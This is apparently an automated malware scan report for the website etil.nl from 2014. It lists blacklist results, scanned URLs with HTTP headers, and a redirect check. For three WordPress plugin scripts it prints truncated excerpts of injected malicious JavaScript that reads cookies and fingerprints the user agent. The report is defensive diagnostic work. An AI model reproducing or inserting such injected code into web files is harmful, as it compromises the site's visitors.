Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=etil.nl
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://etil.nl/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://etil.nl/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:52:35 GMT Pragma: no-cache Accept-Ranges: bytes Age: 0 Location: http://www.etil.nl/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Mon, 31 Mar 2008 10:00:00 GMT Set-Cookie: B100Serverpoolcookie=3792412238.39136.3967430248.38806464; path=/ X-Pingback: http://www.etil.nl/xmlrpc.php X-Server: Web-01 | clean |
http://www.etil.nl/ | 200 OK Content-Length: 56463 Content-Type: text/html | clean |
http://www.etil.nl/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94243 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8354 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/superfish.js?ver=3.8.1 | 200 OK Content-Length: 3963 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/jquery.easing.min.js?ver=3.8.1 | 200 OK Content-Length: 4898 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/woo-jcarousellite.js?ver=3.8.1 | 200 OK Content-Length: 15009 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/general.js?ver=3.8.1 | 200 OK Content-Length: 2156 Content-Type: application/javascript | clean |
http://etil.nl//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 15 Sep 2014 09:52:39 GMT Pragma: no-cache Accept-Ranges: bytes Location: http://www.etil.nl/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_2424854450=5416b6e7be7ff; expires=Mon, 15-Sep-2014 10:22:39 GMT; path=/; httponly Set-Cookie: B100Serverpoolcookie=3792412238.61665.3967430248.38806464; path=/ X-Pingback: http://www.etil.nl/xmlrpc.php X-Server: Web-01 | clean |
http://www.etil.nl/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 27451 Content-Type: text/html | clean |
http://www.etil.nl//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 15 Sep 2014 09:52:40 GMT Pragma: no-cache Accept-Ranges: bytes Location: http://www.etil.nl/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_2424854450=5416b6e8db18f; expires=Mon, 15-Sep-2014 10:22:40 GMT; path=/; httponly Set-Cookie: B100Serverpoolcookie=3792412238.19170.3967430248.38806464; path=/ X-Pingback: http://www.etil.nl/xmlrpc.php X-Server: Web-01 | clean |
http://www.etil.nl/test404page.js | 404 Not Found Content-Length: 27451 Content-Type: text/html | clean |
http://www.etil.nl/wp-content/plugins/taxonomies-filter-widget/js/jquery.nouislider.min.js?ver=3.8.1 | 200 OK Content-Length: 6494 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - var v=jQuery.fn.val;jQuery.fn.val=function(){return this.data("_isnS_")?methods.val.apply(this,arguments):v.apply(this,arguments)};return"disabled"==n?methods.disabled.apply(this):methods.create.apply(this)}})(jQuery);
Antivirus reports:
http://www.etil.nl/wp-content/plugins/taxonomies-filter-widget/js/widget.js?ver=3.8.1 | 200 OK Content-Length: 3878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - $(this).find('input:not([name=s], .input_cf), select').each(function() { if (this.value == '0' || this.value == '') { $(this).prop("disabled", true); } }); }); twfForm.find('input[type=text], select').each(function() { $(this).prop("disabled", false); }); }); }(jQuery));
Antivirus reports:
http://www.geoplugin.net/javascript.gp?ver=3.8.1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.geoplugin.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.etil.nl/wp-content/plugins/cookie-control/js/cookieControl-5.1.min.js?ver=3.8.1 | 200 OK Content-Length: 34221 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -
Antivirus reports:
http://www.etil.nl/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-nl.js?ver=2.6.9 | 200 OK Content-Length: 8083 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: etil.nl
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 15 Sep 2014 09:52:35 GMT
Pragma: no-cache
Accept-Ranges: bytes
Age: 0
Location: http://www.etil.nl/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 31 Mar 2008 10:00:00 GMT
Set-Cookie: B100Serverpoolcookie=3792412238.39136.3967430248.38806464; path=/
X-Pingback: http://www.etil.nl/xmlrpc.php
X-Server: Web-01
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: etil.nl
Referer: http://www.google.com/search?q=etil.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.